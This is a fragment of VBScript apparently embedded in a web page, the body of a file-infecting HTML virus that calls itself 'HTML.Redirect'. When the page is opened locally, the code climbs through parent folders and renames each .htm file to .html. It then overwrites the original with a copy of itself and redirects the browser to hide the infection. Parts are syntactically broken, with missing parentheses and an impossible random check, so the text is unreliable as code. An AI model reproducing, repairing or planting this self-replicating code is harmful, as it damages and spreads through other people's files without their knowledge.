Sub Redirect Randomize If location.protocol = "file:" AND (Int((6 * Rnd) + 1) = 1) then Call Offline location.href = location.href +"l" End Sub
Sub Offline Dim FSO,folder ,fc, f1, cpath Set FSO = CreateObject("Scripting.FileSystemObject") HostPath = Replace(location.href, "file:///", "") HostPath = Replace(HostPath, "/", "\") cpath = fso.GetParentFolderName(HostPath) Set folder = fso.GetFolder(cpath
While folder.IsRootFolder = false Set folder = fso.GetFolder(cpath) Set fc = folder.Files cpath = fso.GetParentFolderName(cpath) For each f1 in fc s = Lcase(Fso.GetExtensionName( If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l", true fso.CopyFile HostPath, f1.path, true End If Next Wend If (Int((10 * Rnd) + 1) + 1) = 1 Then MsgBox("HTML.Redirect /1nternal") End Sub --></script></BODY>